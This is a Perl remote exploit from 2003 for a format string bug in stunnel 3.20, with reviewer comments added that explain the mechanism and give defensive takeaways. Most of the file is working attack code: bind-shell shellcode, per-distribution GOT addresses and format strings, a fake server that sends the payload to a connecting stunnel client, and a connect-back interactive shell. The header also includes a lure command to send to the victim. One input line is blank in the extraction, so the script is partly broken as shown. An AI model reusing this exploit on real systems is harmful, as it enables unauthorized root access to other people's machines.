#!/usr/bin/perl
###########################################################
# Stunnel version 3.20 remote exploit !!!.
#
# This is the old format string bug on stunnel
# with automatized process.
# The victim will connect on your fake server
# and it ll try to give us a shell instantly.
# Proof of Concept!!
# Connect using this command !
# Send this command to the victim
# stunnel -c -n smtp -r YOURIP:6666
#
#[wsxz@localhost buffer]$ perl priv8tunnel.pl 1 6666
#Waiting for jackass to connect....
#[Jackass connected from localhost]
#Sending evil string....
#Lets see if we got shell....
#Enjoy your stay on this server =)
#
#Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 unknown unknown GNU/Linux
#uid=0(root) gid=0(root) groups=0(root)
#####################################################
#
# NOTE(review): historical (2003) proof of concept against stunnel 3.20.
# What the script itself shows about the issue, for anyone triaging it:
#   - The vulnerable path is stunnel run in client mode with SMTP
#     protocol negotiation (`-c -n smtp -r host:port`, per the usage
#     above); the data the *remote peer* sends during that negotiation
#     is what reaches the format string bug, so the "server" here is the
#     attacker and the stunnel client is the victim.
#   - The hard-coded addresses below are labelled "got vsnprintf" /
#     ".got exit", i.e. per-distribution GOT entries; the payload only
#     works against the exact builds listed in the usage text.
#   - The shellcode comment says it forks and binds TCP port 5074; the
#     script then connects back to that port and runs `uname -a;id`.
#     The sample transcript shows uid=0, i.e. stunnel was running as root.
# Defensive takeaways grounded in the above: patch stunnel past the
# affected release, do not run stunnel as root (a successful exploit
# inherits its privileges), and treat an stunnel process that starts
# listening on an unexpected port (5074 here) or spawns a shell as an
# indicator of this class of attack.
#
# NOTE(review): the file has no `use strict; use warnings;`, so every
# variable other than $sock/$new_sock is a package global, and the
# socket is created with indirect-object syntax (`new IO::Socket::INET`).
# Left as-is; this is a record of the original PoC, not maintained code.

use IO::Socket;
use Net::hostent;

# Raw x86 payload, taken verbatim from the original.  The trailing bytes
# spell "//bin/sh", consistent with the comment that it ends in a shell.
$shellcode2 = #fork() and bind port 5074 by s0t4ipv6@shellcode.com.ar
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01".
"\xcd\x80\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40".
"\x89\x45\x08\x8d\x4d\x08\xb0\x66\xcd\x80\x89\x45\x08\x43".
"\x66\x89\x5d\x14\x66\xc7\x45\x16\x13\xd2\x31\xd2\x89\x55\x18".
"\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80".
"\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c".
"\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80".
"\x41\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68".
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

# Two positional arguments: a target number (selects the address set
# below) and the local TCP port to listen on.  Anything else prints the
# usage text and exits.
if (@ARGV == 2) {
    $target = $ARGV[0];
    $port = $ARGV[1];
}else{
    printf("\n!! Priv8security.com Stunnel remote exploit !!\n");
    printf(" usage: $0 target port\n");
    printf(" Ex: perl $0 1 6666\n\n");
    printf(" List of targets:\n");
    printf(" 1 - Linux Mandrake 9.1 Stunnel 3.20\n");
    printf(" 2 - Linux Mandrake 9.0 Stunnel 3.20\n");
    printf(" 3 - Linux Redhat 7.3 Stunnel 3.20\n");
    printf(" 4 - Linux Slackware 8.1 Stunnel 3.20\n\n");
    exit(1);
}

# Per-target constants.  $retword is a pair of little-endian 32-bit
# addresses (the author's comments say they are GOT entries); $fmtstring
# is the printf-style format that is sent after the shellcode.  The
# original author kept commented-out ".got exit" alternatives for
# targets 3 and 4.  An unknown target number leaves both undefined and
# the script still proceeds.
if ( $target eq "1" ) {
    $retword = "\xf4\x23\x05\x08\xf6\x23\x05\x08"; #mister got vsnprintf | objdump -R ./stunnel |grep vsn
    $fmtstring = '%.48504x%4$hn%.11954x%3$hn';
}
if ( $target eq "2" ) {
    $retword = "\xf8\x23\x05\x08\xfa\x23\x05\x08"; #mister got vsnprintf
    $fmtstring = '%.48504x%4$hn%.11954x%3$hn';
}
if ( $target eq "3" ) {
#    $retword = "\x3c\x6b\x05\x08\x3e\x6b\x05\x08"; #mister .got exit
    $retword = "\xe8\x69\x05\x08\xea\x69\x05\x08";#mister got vsnprintf
    $fmtstring = '%.48504x%4$hn%.11950x%3$hn';
}
if ( $target eq "4" ) {
#$retword = "\x64\x5a\x05\x08\x66\x5a\x05\x08"; #mister .got exit
    $retword = "\xdc\x69\x05\x08\xde\x69\x05\x08";#mister got vsnprintf
    $fmtstring = '%.48504x%10$hn%.11550x%9$hn';
}
# Target 5 is not listed in the usage text above.
if ( $target eq "5" ) {
    $retword = "\x14\x25\x05\x08\x16\x25\x05\x08"; #mister .got exit
    $fmtstring = '%.48504x%4\$hn%.11950x%3\$hn';
}

# Assemble the line that will be sent to the connecting stunnel client:
# addresses, 0x90 (x86 NOP) padding sized so that padding+shellcode is
# always 547+92 bytes, the shellcode, then the format string.
$buffer .= $retword;
$buffer .= "\x90" x (547 + 92 - length($shellcode2));
$buffer .= $shellcode2;
$buffer .= $fmtstring;

# Listen on $port and wait for the victim's stunnel to connect to us.
my $sock = new IO::Socket::INET (LocalPort => $port,Proto => 'tcp',Listen => 1,Reuse => 1);
die "Could not create socket: $!\n" unless $sock;

print "Waiting for jackass to connect....\n";
while (my $new_sock = $sock->accept()){
    # The payload is sent as a single line, before anything is printed.
    print $new_sock "$buffer\n";
    # Reverse-lookup the peer; the result is reused below as the host to
    # connect back to, so the callback relies on the name resolving.
    $hostinfo = gethostbyaddr($new_sock->peeraddr);
    printf "[Jackass connected from %s]\n", $hostinfo->name || $new_sock->peerhost;
    print "Sending evil string....\n";
    print "Lets see if we got shell....\n";
    # Give the shellcode time to fork and bind before connecting back.
    sleep(3);
    $handle = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$hostinfo->name,PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1) or die "No luck, try next time ok :-(\n";
    print "Enjoy your stay on this server =)\n\n";
    $handle->autoflush(1);
    print $handle "uname -a;id\n";
    # Fork so that one process relays socket -> stdout and the other
    # stdin -> socket.
    die "cant fork: $!" unless defined($kidpid = fork());
    if ($kidpid) {
        # copy the socket to standard output
        while (defined ($line = <$handle>)) {
            print STDOUT $line;
        }
        # Remote side went away: stop the stdin-reading child too.
        kill("TERM", $kidpid);
    }
    # the else{} block runs only in the child process
    else {
        # copy standard input to the socket
        # NOTE(review): the right-hand side of this assignment is empty
        # in the page as extracted (apparently lost in conversion), so
        # this line does not parse as shown.
        while (defined ($line = )) {
            print $handle $line;
        }
    }
    # Closes the *listening* socket, so the accept() loop ends after the
    # first connection rather than serving further clients.
    close($sock);
}